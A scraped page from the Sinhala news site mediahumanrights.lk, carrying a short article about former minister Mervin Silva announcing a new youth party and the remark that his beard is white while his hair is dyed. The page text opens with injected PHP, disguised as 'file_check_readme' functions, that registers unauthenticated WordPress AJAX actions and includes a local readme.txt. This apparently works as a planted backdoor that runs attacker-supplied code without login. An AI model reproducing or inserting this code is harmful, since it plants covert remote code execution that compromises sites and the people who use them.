if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රැවුල සුදුවී කොණ්ඩය කළු වූ ආකාරය ගැන මර්වින් කිව්ව කතාව - mediahumanrights.lk
mediahumanrights.lk
Local News News Political

රැවුල සුදුවී කොණ්ඩය කළු වූ ආකාරය ගැන මර්වින් කිව්ව කතාව

තමන් විසින් ළඟදීම තරුණ තරුණියන් වෙනුවෙන් නව දේශපාලන පක්ෂයක් ආරම්භ කරන බව හිටපු ඇමති මර්වින් සිල්වා පසුගියදා මාධ්‍ය වෙත අදහස් දක්වමින් පවසා තිබුණා.
පැරුණි දේශපාලකයන් දේශපාලනයෙන් ඉවත්කර තරුණ පිරිසට ඒ අවස්ථාව ලබාදීම තම පක්ෂය පිහිටුවීමේ අරමුණ බව පවසන ඔහු බොරු දත්, බොරු කොණ්ඩ සහ කොණ්ඩ ඩයි කරන ලද වයසක දේශපාලනඥයන් අත ඇති බලය තරුණයන්ට පැවරීමෙන් නව බලවේගයක් ගොඩනැගෙන බව කියා තිබුණා.
කෙසේ නමුත් මෙම කතාව සිදු කරන අවස්ථාවේ මර්වින් සිල්වා ස්වාභාවික ලෙස සුදු පැහැ වුණ රැවුල වවා තිබුණ නමුත් කොණ්ඩය ඩයි කර තිබීම විශේෂත්වයක්.
(under the courtesy of adaderana news web)

Related posts

ජනාධිපති එලෙවුවට පස්සෙ සම්පූර්ණ සිස්ටම් චේන්ජ් එක මේ කොලේ ලස්සනට තියෙනවා..- රැට්ටා

Shiran Viraj

අයවැයෙන් කොපමණ සහන දුන්නත් අපට කමක් නෑ.. ඒ සියල්ල රජය උපයාගත යුතුයි..- IMF

Shiran Viraj

මැදපෙරදිග කොරෝනාවලින් 30ක් මැරිලා.. 05ක් දිවි නසාගෙන.. වහා ලංකාවට ගෙන්වනු..- පෙරටුගාමීන් කොළඹ විරෝධතා..

Shiran Viraj